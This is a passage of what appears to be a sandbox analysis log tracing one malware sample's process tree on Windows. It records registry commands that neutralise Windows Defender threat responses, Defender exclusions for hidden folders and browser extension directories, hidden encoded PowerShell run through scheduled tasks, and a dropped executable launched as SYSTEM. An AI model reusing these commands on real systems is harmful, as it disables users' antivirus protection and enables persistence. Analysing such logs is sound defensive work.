Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                2⤵
                                                                                  PID:2828
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                    3⤵
                                                                                      PID:1760
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                        4⤵
                                                                                          PID:3336
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                        3⤵
                                                                                          PID:1464
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                          3⤵
                                                                                            PID:4016
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                            3⤵
                                                                                              PID:3052
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                              3⤵
                                                                                                PID:3492
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                3⤵
                                                                                                  PID:2992
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                  3⤵
                                                                                                    PID:3076
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                    3⤵
                                                                                                      PID:4584
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                      3⤵
                                                                                                        PID:1544
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                        3⤵
                                                                                                          PID:3760
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                          3⤵
                                                                                                            PID:4772
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                            3⤵
                                                                                                              PID:2820
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                              3⤵
                                                                                                                PID:3548
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                3⤵
                                                                                                                  PID:3564
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:3116
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:1908
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:4600
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:1436
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:3944
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:3696
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:4048
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:200
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:4148
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:3224
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:1628
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:1776
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:3124
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:1072
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AqhCymdmIBUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AqhCymdmIBUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QubjZgZsgVxU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QubjZgZsgVxU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XhLCDmquyDmYC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XhLCDmquyDmYC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tSRsKJOgU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tSRsKJOgU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mjUPcNFqgWzmMMVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mjUPcNFqgWzmMMVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PKLMGLEKhliiDLHGb\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PKLMGLEKhliiDLHGb\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gGlzHXLNukBnGkUk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gGlzHXLNukBnGkUk\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                            2⤵
                                                                                                                                              PID:5044
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AqhCymdmIBUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:728
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AqhCymdmIBUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4756
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AqhCymdmIBUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2312
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QubjZgZsgVxU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:3648
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QubjZgZsgVxU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:652
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XhLCDmquyDmYC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1900
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XhLCDmquyDmYC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:2484
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4240
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:4796
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tSRsKJOgU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4352
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tSRsKJOgU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:1960
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mjUPcNFqgWzmMMVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4716
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mjUPcNFqgWzmMMVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4804
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:2672
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4680
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:3548
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4284
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PKLMGLEKhliiDLHGb /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:408
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PKLMGLEKhliiDLHGb /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1436
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gGlzHXLNukBnGkUk /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:3944
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gGlzHXLNukBnGkUk /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:1704
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /CREATE /TN "gqMeAsLLy" /SC once /ST 12:56:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                        PID:568
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /run /I /tn "gqMeAsLLy"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:2040
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /DELETE /F /TN "gqMeAsLLy"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:3964
                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                            schtasks /CREATE /TN "YNRMAHHYAWtfapctR" /SC once /ST 06:25:06 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gGlzHXLNukBnGkUk\JuzkbKfKfyDoQdV\ylKpRBB.exe\" p2 /CmhLdidTX 385132 /S" /V1 /F
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                            PID:2348
                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                            schtasks /run /I /tn "YNRMAHHYAWtfapctR"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:2396
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 844
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              PID:2448
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            PID:3404
                                                                                                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:2944
                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:4068
                                                                                                                                                                                              • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:1096
                                                                                                                                                                                                • C:\Windows\Temp\gGlzHXLNukBnGkUk\JuzkbKfKfyDoQdV\ylKpRBB.exe
                                                                                                                                                                                                  C:\Windows\Temp\gGlzHXLNukBnGkUk\JuzkbKfKfyDoQdV\ylKpRBB.exe p2 /CmhLdidTX 385132 /S
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:3164
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /DELETE /F /TN "bTVQzzKDZQMhkLPDbz"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4696
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:3056
                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:3648
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:4308
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                    5⤵
